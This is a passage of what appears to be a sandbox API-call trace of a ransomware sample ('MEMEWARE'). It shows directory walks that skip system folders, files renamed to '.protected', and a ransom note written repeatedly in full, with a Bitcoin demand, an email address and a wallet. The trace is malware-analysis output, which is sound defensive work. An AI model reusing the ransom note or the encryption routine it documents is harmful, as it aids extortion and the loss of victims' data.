lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0086.976] CloseHandle (hObject=0x14c) returned 1 [0086.976] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe.protected") returned 79 [0086.976] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\au_.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\au_.exe.protected")) returned 1 [0086.977] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.977] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.977] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\RESTORE_FILES.txt") returned 79 [0086.977] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.979] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.979] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.980] lstrlenA (lpString="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") returned 684 [0086.980] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.980] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.980] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.980] CloseHandle (hObject=0xd8) returned 1 [0086.980] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0086.980] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0086.980] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES.txt") returned 70 [0086.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0086.981] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.981] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0086.982] lstrlenA (lpString="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") returned 684 [0086.982] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0086.982] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.982] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0086.982] CloseHandle (hObject=0xd4) returned 1 [0086.983] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Windows") returned -1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files") returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files (x86)") returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="$Recycle.bin") returned 1 [0086.983] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="System Volume Information") returned 1 [0086.983] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files") returned 72 [0086.983] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0086.983] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0086.984] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*") returned 74 [0086.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0086.984] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 
[0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="Windows") returned -1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="Program Files") returned 1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="Program Files (x86)") returned 1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="$Recycle.bin") returned 1 [0086.984] lstrcmpiW (lpString1="VirtualStore", lpString2="System Volume Information") returned 1 [0086.984] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore") returned 60 [0086.984] lstrcmpW (lpString1="VirtualStore", lpString2=".") returned 1 [0086.984] lstrcmpW (lpString1="VirtualStore", lpString2="..") returned 1 [0086.984] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*") returned 62 [0086.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0086.985] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.985] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.985] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.985] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.985] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.985] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\.") returned 62 [0086.985] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.985] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.985] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0086.985] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.985] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.985] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.985] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\..") returned 63 [0086.985] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.985] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.985] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0086.985] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0086.985] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\RESTORE_FILES.txt") returned 78 [0086.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0086.986] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.986] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0086.987] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.987] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0086.987] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.987] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0086.987] CloseHandle (hObject=0xd4) returned 1 [0086.988] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0086.988] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0086.988] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RESTORE_FILES.txt") returned 65 [0086.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0086.989] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.989] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0086.990] lstrlenA (lpString="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") returned 684 [0086.990] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0086.990] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.990] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.990] CloseHandle (hObject=0xb4) returned 1 [0086.990] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="Windows") returned -1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files") returned -1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files (x86)") returned -1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="$Recycle.bin") returned 1 [0086.990] lstrcmpiW (lpString1="LocalLow", lpString2="System Volume Information") returned -1 [0086.990] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 50 [0086.991] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0086.991] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*") returned 52 [0086.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0086.991] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.991] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.991] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.991] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.991] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\.") returned 52 [0086.991] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.991] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) 
returned 1 [0086.991] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.991] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.991] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.991] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.991] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\..") returned 53 [0086.991] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.991] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.991] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0086.991] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0086.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe") returned 56 [0086.991] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0086.991] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0086.992] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*") returned 58 [0086.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0086.993] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.993] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0086.993] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.993] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.993] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.993] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\.") returned 58 [0086.993] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.993] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.993] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.993] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.993] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.993] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.993] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.993] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\..") returned 59 [0086.993] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.993] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.993] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.993] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0086.994] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0086.994] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat") returned 64 [0086.994] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0086.994] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0086.994] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*") returned 66 [0086.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.994] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.994] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.994] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.994] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.994] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.994] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\.") returned 66 [0086.994] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.994] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.995] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.995] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.995] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.995] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.995] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.995] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\..") returned 67 [0086.995] lstrcmpW (lpString1="..", lpString2=".") 
